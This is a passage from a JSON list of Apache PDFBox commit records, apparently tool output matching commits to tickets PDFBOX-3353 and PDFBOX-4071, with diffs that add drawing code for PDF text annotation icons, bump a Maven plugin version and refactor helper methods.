"+ GeneralPath path = PDType1Font.ZAPF_DINGBATS.getPath(\"a20\");", + "+ addPath(contentStream, path);", + "+ contentStream.fillAndStroke();", + "+ }", + "+", + "+ //TODO this is mostly identical to drawStar, except for scale, translation and symbol", + "+ private void drawRightPointer(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "+ throws IOException", + "+ {", + "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 17);", + "+", + "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(1);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(0.59f); // value from Adobe", + "+", + "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 0.8f, 0.001f * min / 0.8f));", + "+ contentStream.transform(Matrix.getTranslateInstance(0, 50));", + "+", + "+ // we get the shape of a Zapf Dingbats right pointer (0x27A4) and use that one.", + "+ // Adobe uses a different font (which one?), or created the shape from scratch.", + "+ GeneralPath path = PDType1Font.ZAPF_DINGBATS.getPath(\"a174\");", + "+ addPath(contentStream, path);", + "+ contentStream.fillAndStroke();", + "+ }", + "+", + "+ private void drawRightArrow(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "+ throws IOException", + "+ {", + "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 20);", + "+", + "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(1);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(0.59f); // value from Adobe", + "+", + "+ // Adobe first fills a white circle with CA ca 0.6, so do we", + "+ contentStream.saveGraphicsState();", + "+ contentStream.setLineWidth(1);", + "+ PDExtendedGraphicsState gs = new PDExtendedGraphicsState();", + "+ gs.setAlphaSourceFlag(false);", + "+ gs.setStrokingAlphaConstant(0.6f);", + "+ gs.setNonStrokingAlphaConstant(0.6f);", + "+ gs.setBlendMode(BlendMode.NORMAL);", + "+ contentStream.setGraphicsStateParameters(gs);", + "+ contentStream.setNonStrokingColor(1f);", + "+ drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", + "+ contentStream.fill();", + "+ contentStream.restoreGraphicsState();", + "+", + "+ contentStream.saveGraphicsState();", + "+ // rescale so that the glyph fits into circle and move it to circle center", + "+ // values gathered by trial and error", + "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 1.3f, 0.001f * min / 1.3f));", + "+ contentStream.transform(Matrix.getTranslateInstance(200, 300));", + "+", + "+ // we get the shape of a Zapf Dingbats right arrow and use that one.", + "+ // Adobe uses a different font (which one?), or created the shape from scratch.", + "+ GeneralPath path = PDType1Font.ZAPF_DINGBATS.getPath(\"a160\");", + "+ addPath(contentStream, path);", + "+ contentStream.restoreGraphicsState();", + "+ // surprisingly, this one not counterclockwise.", + "+ drawCircle(contentStream, min / 2, min / 2, min / 2 - 1);", + "+ contentStream.fillAndStroke();", + "+ }", + "+", + "+", + " private void addPath(final PDAppearanceContentStream contentStream, GeneralPath path) throws IOException" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "cbae566275035cc60a14324d465a633e5262433f", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532366099, + "hunks": 1, + "message": "PDFBOX-4071: use latest plugin version git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836508 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 134f56ba2..9541dd891 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -276,3 +276,3 @@", + " maven-bundle-plugin", + "- 3.5.0", + "+ 3.5.1", + " " + ], + "changed_files": [ + "parent/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "cfe35b1f6a0ce755cf5933818cdf0b0e37f7a86d", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530116504, + "hunks": 4, + "message": "PDFBOX-3353: support /UpArrow and /UpLeftArrow git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834518 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index 8d58eff54..6cc503e4a 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -60,2 +60,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " SUPPORTED_NAMES.add(PDAnnotationText.NAME_CROSS_HAIRS);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_UP_ARROW);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_UP_LEFT_ARROW);", + " }", + "@@ -83,3 +85,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " // BBox values:", + "- // key 18 18", + "+ // Key 13 18", + " // Comment 18 18", + "@@ -142,2 +144,8 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " break;", + "+ case PDAnnotationText.NAME_UP_ARROW:", + "+ drawUpArrow(annotation, contentStream);", + "+ break;", + "+ case PDAnnotationText.NAME_UP_LEFT_ARROW:", + "+ drawUpLeftArrow(annotation, contentStream);", + "+ break;", + " default:", + "@@ -494,2 +502,44 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "+ private void drawUpArrow(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "+ throws IOException", + "+ {", + "+ adjustRectAndBBox(annotation, 17, 20);", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(1);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(0.59f); // value from Adobe", + "+", + "+ contentStream.moveTo(1, 7);", + "+ contentStream.lineTo(5, 7);", + "+ contentStream.lineTo(5, 1);", + "+ contentStream.lineTo(12, 1);", + "+ contentStream.lineTo(12, 7);", + "+ contentStream.lineTo(16, 7);", + "+ contentStream.lineTo(8.5f, 19);", + "+ contentStream.closeAndFillAndStroke();", + "+ }", + "+", + "+ private void drawUpLeftArrow(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "+ throws IOException", + "+ {", + "+ adjustRectAndBBox(annotation, 17, 17);", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(1);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(0.59f); // value from Adobe", + "+ ", + "+ contentStream.transform(Matrix.getRotateInstance(Math.toRadians(45), 8, -4));", + "+", + "+ contentStream.moveTo(1, 7);", + "+ contentStream.lineTo(5, 7);", + "+ contentStream.lineTo(5, 1);", + "+ contentStream.lineTo(12, 1);", + "+ contentStream.lineTo(12, 7);", + "+ contentStream.lineTo(16, 7);", + "+ contentStream.lineTo(8.5f, 19);", + "+ contentStream.closeAndFillAndStroke();", + "+ }", + "+ ", + " private void drawRightArrow(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "d5d125124360820c6ef799320b8457fb4537d182", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529610393, + "hunks": 2, + "message": "PDFBOX-3353: HELVETICA_BOLD looks better git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834049 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index c4776034d..6211ffe18 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -301,5 +301,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- // we get the shape of an Helvetica \"?\" and use that one.", + "+ // we get the shape of an Helvetica bold \"?\" and use that one.", + " // Adobe uses a different font (which one?), or created the shape from scratch.", + "- GeneralPath path = PDType1Font.HELVETICA.getPath(\"question\");", + "+ GeneralPath path = PDType1Font.HELVETICA_BOLD.getPath(\"question\");", + " addPath(contentStream, path);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "630de0b0eac6d6ca9d457f41c9b80ecb967708a9", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529735154, + "hunks": 3, + "message": "PDFBOX-3353: correct comments, add some thought for future refactoring git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834180 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index a510d19b1..2e5708ed6 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -425,2 +425,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " //TODO this is mostly identical to drawStar, except for scale, translation and symbol", + "+ // maybe use a table with all values and draw from there", + "+ // this could also optionally use outer circle", + " private void drawCheck(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "@@ -485,3 +487,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- // we get the shape of a Zapf Dingbats right pointer (0x27A4) and use that one.", + "+ // we get the shape of a Symbol crosshair (0x2295) and use that one.", + " // Adobe uses a different font (which one?), or created the shape from scratch.", + "@@ -524,3 +526,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- // we get the shape of a Zapf Dingbats right arrow and use that one.", + "+ // we get the shape of a Zapf Dingbats right arrow (0x2794) and use that one.", + " // Adobe uses a different font (which one?), or created the shape from scratch." + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "c9f4ee13fb90cfad12c5a32e74f90285985db84f", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528392434, + "hunks": 4, + "message": "PDFBOX-3353: create handler for text annotation and support Note git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833130 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "index 415f6ef73..9576df314 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "@@ -20,2 +20,4 @@ import org.apache.pdfbox.cos.COSDictionary;", + " import org.apache.pdfbox.cos.COSName;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAppearanceHandler;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDTextAppearanceHandler;", + "@@ -28,2 +30,3 @@ public class PDAnnotationText extends PDAnnotationMarkup", + " {", + "+ private PDAppearanceHandler customAppearanceHandler;", + "@@ -173,2 +176,25 @@ public class PDAnnotationText extends PDAnnotationMarkup", + "+ /**", + "+ * Set a custom appearance handler for generating the annotations appearance streams.", + "+ * ", + "+ * @param appearanceHandler", + "+ */", + "+ public void setCustomAppearanceHandler(PDAppearanceHandler appearanceHandler)", + "+ {", + "+ customAppearanceHandler = appearanceHandler;", + "+ }", + "+", + "+ @Override", + "+ public void constructAppearances()", + "+ {", + "+ if (customAppearanceHandler == null)", + "+ {", + "+ PDTextAppearanceHandler appearanceHandler = new PDTextAppearanceHandler(this);", + "+ appearanceHandler.generateAppearanceStreams();", + "+ }", + "+ else", + "+ {", + "+ customAppearanceHandler.generateAppearanceStreams();", + "+ }", + "+ }", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "new file mode 100644", + "index 000000000..b76e2e372", + "--- /dev/null", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -0,0 +1,115 @@", + "+/*", + "+ * Copyright 2018 The Apache Software Foundation.", + "+ *", + "+ * Licensed under the Apache License, Version 2.0 (the \"License\");", + "+ * you may not use this file except in compliance with the License.", + "+ * You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", + "+", + "+import java.io.IOException;", + "+import org.apache.commons.logging.Log;", + "+import org.apache.commons.logging.LogFactory;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationText;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", + "+", + "+/**", + "+ *", + "+ * @author Tilman Hausherr", + "+ */", + "+public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "+{", + "+ private static final Log LOG = LogFactory.getLog(PDTextAppearanceHandler.class);", + "+", + "+ public PDTextAppearanceHandler(PDAnnotation annotation)", + "+ {", + "+ super(annotation);", + "+ }", + "+", + "+ @Override", + "+ public void generateAppearanceStreams()", + "+ {", + "+ generateNormalAppearance();", + "+ generateRolloverAppearance();", + "+ generateDownAppearance();", + "+ }", + "+", + "+ @Override", + "+ public void generateNormalAppearance()", + "+ {", + "+ PDAnnotationText annotation = (PDAnnotationText) getAnnotation();", + "+ if (!PDAnnotationText.NAME_NOTE.equals(annotation.getName()))", + "+ {", + "+ //TODO Comment, Key, Help, NewParagraph, Paragraph, Insert", + "+ return;", + "+ }", + "+", + "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", + "+ {", + "+ boolean hasBackground = contentStream.setNonStrokingColorOnDemand(getColor());", + "+ setOpacity(contentStream, annotation.getConstantOpacity());", + "+ ", + "+ //TODO find out what Adobe chooses if color is missing", + "+", + "+ PDRectangle rect = getRectangle();", + "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + "+ PDRectangle bbox = rect.createRetranslatedRectangle();", + "+ appearanceStream.setBBox(bbox);", + "+", + "+ switch (annotation.getName())", + "+ {", + "+ case PDAnnotationText.NAME_NOTE:", + "+ drawNote(contentStream, bbox, hasBackground);", + "+ break;", + "+", + "+ default:", + "+ break;", + "+ }", + "+", + "+ }", + "+ catch (IOException e)", + "+ {", + "+ LOG.error(e);", + "+ }", + "+", + "+ }", + "+", + "+ private void drawNote(final PDAppearanceContentStream contentStream, PDRectangle bbox, boolean hasBackground)", + "+ throws IOException", + "+ {", + "+ contentStream.setLineJoinStyle(1); // round edge", + "+ contentStream.addRect(1, 1, bbox.getWidth() - 2, bbox.getHeight() - 2);", + "+ contentStream.moveTo(bbox.getWidth() / 4, bbox.getHeight() / 7 * 2);", + "+ contentStream.lineTo(bbox.getWidth() * 3 / 4 - 1, bbox.getHeight() / 7 * 2);", + "+ contentStream.moveTo(bbox.getWidth() / 4, bbox.getHeight() / 7 * 3);", + "+ contentStream.lineTo(bbox.getWidth() * 3 / 4 - 1, bbox.getHeight() / 7 * 3);", + "+ contentStream.moveTo(bbox.getWidth() / 4, bbox.getHeight() / 7 * 4);", + "+ contentStream.lineTo(bbox.getWidth() * 3 / 4 - 1, bbox.getHeight() / 7 * 4);", + "+ contentStream.moveTo(bbox.getWidth() / 4, bbox.getHeight() / 7 * 5);", + "+ contentStream.lineTo(bbox.getWidth() * 3 / 4 - 1, bbox.getHeight() / 7 * 5);", + "+ contentStream.drawShape(1, true, hasBackground);", + "+ }", + "+", + "+ @Override", + "+ public void generateRolloverAppearance()", + "+ {", + "+ // No rollover appearance generated", + "+ }", + "+", + "+ @Override", + "+ public void generateDownAppearance()", + "+ {", + "+ // No down appearance generated", + "+ }", + "+}" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "1d34c55e23ce459d4cda435c16b49e24f5df0c6c", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528481842, + "hunks": 5, + "message": "PDFBOX-3353: rename methods in line with existing ones git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833199 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "index 7f80bdcdf..1300770d9 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "@@ -290,3 +290,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " case PDAnnotationLine.LE_CIRCLE:", + "- addCircle(cs, x, y, width * 3);", + "+ drawCircle(cs, x, y, width * 3);", + " break;", + "@@ -376,3 +376,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " */", + "- void addCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + "+ void drawCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + " {", + "@@ -399,3 +399,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " */", + "- void addCircle2(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + "+ void drawCircle2(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + " {", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index 9f6772fab..5e0241496 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -148,3 +148,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.setNonStrokingColor(1f);", + "- addCircle(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, smallR);", + "+ drawCircle(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, smallR);", + " contentStream.fill();", + "@@ -153,4 +153,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.setLineWidth(0.59f); // value from Adobe", + "- addCircle(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, smallR);", + "- addCircle2(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, largeR);", + "+ drawCircle(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, smallR);", + "+ drawCircle2(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, largeR);", + " contentStream.fillAndStroke();" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "6ed7ca7336fa8776d35347f0d4c242f0a756f048", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528548071, + "hunks": 2, + "message": "PDFBOX-4071: java coding convention, first static class variables, then constructor, then methods git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833232 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "index 338ff8fcf..620bb669a 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "@@ -32,46 +32,2 @@ public abstract class BlendMode", + " {", + "- /**", + "- * Determines the blend mode from the BM entry in the COS ExtGState.", + "- *", + "- * @param cosBlendMode name or array", + "- * @return blending mode", + "- */", + "- public static BlendMode getInstance(COSBase cosBlendMode)", + "- {", + "- BlendMode result = null;", + "- if (cosBlendMode instanceof COSName)", + "- {", + "- result = BLEND_MODES.get(cosBlendMode);", + "- }", + "- else if (cosBlendMode instanceof COSArray)", + "- {", + "- COSArray cosBlendModeArray = (COSArray) cosBlendMode;", + "- for (int i = 0; i < cosBlendModeArray.size(); i++)", + "- {", + "- result = BLEND_MODES.get(cosBlendModeArray.getObject(i));", + "- if (result != null)", + "- {", + "- break;", + "- }", + "- }", + "- }", + "-", + "- if (result != null)", + "- {", + "- return result;", + "- }", + "- return BlendMode.NORMAL;", + "- }", + "- ", + "- /**", + "- * Determines the blend mode name from the BM object.", + "- *", + "- * @param bm Blend mode.", + "- * @return name of blend mode.", + "- */", + "- public static COSName getCOSName(BlendMode bm)", + "- {", + "- return BLEND_MODE_NAMES.get(bm);", + "- }", + "-", + " public static final SeparableBlendMode NORMAL = new SeparableBlendMode()", + "@@ -257,2 +213,46 @@ public abstract class BlendMode", + "+ /**", + "+ * Determines the blend mode from the BM entry in the COS ExtGState.", + "+ *", + "+ * @param cosBlendMode name or array", + "+ * @return blending mode", + "+ */", + "+ public static BlendMode getInstance(COSBase cosBlendMode)", + "+ {", + "+ BlendMode result = null;", + "+ if (cosBlendMode instanceof COSName)", + "+ {", + "+ result = BLEND_MODES.get(cosBlendMode);", + "+ }", + "+ else if (cosBlendMode instanceof COSArray)", + "+ {", + "+ COSArray cosBlendModeArray = (COSArray) cosBlendMode;", + "+ for (int i = 0; i < cosBlendModeArray.size(); i++)", + "+ {", + "+ result = BLEND_MODES.get(cosBlendModeArray.getObject(i));", + "+ if (result != null)", + "+ {", + "+ break;", + "+ }", + "+ }", + "+ }", + "+", + "+ if (result != null)", + "+ {", + "+ return result;", + "+ }", + "+ return BlendMode.NORMAL;", + "+ }", + "+ ", + "+ /**", + "+ * Determines the blend mode name from the BM object.", + "+ *", + "+ * @param bm Blend mode.", + "+ * @return name of blend mode.", + "+ */", + "+ public static COSName getCOSName(BlendMode bm)", + "+ {", + "+ return BLEND_MODE_NAMES.get(bm);", + "+ }", + "+", + " private static int get255Value(float val)" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "8ea8645ae8b878c9ae77c0b0a21f1091f8801573", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528135573, + "hunks": 2, + "message": "PDFBOX-3353: some styles do not rotate with the line, e.g. square and diamond, so add a set constant for angled styles that do rotate, e.g. arrows git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832874 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "index 6b65aa2f6..83a00d9cb 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "@@ -60,2 +60,7 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " protected static final Set INTERIOR_COLOR_STYLES = createInteriorColorStyles();", + "+ ", + "+ /**", + "+ * Line ending styles where the shape changes its angle, e.g. arrows.", + "+ */", + "+ protected static final Set ANGLED_STYLES = createAngledStyles();", + "@@ -405,2 +410,14 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + "+ private static Set createAngledStyles()", + "+ {", + "+ Set angledStyles = new HashSet<>();", + "+ angledStyles.add(PDAnnotationLine.LE_CLOSED_ARROW);", + "+ angledStyles.add(PDAnnotationLine.LE_OPEN_ARROW);", + 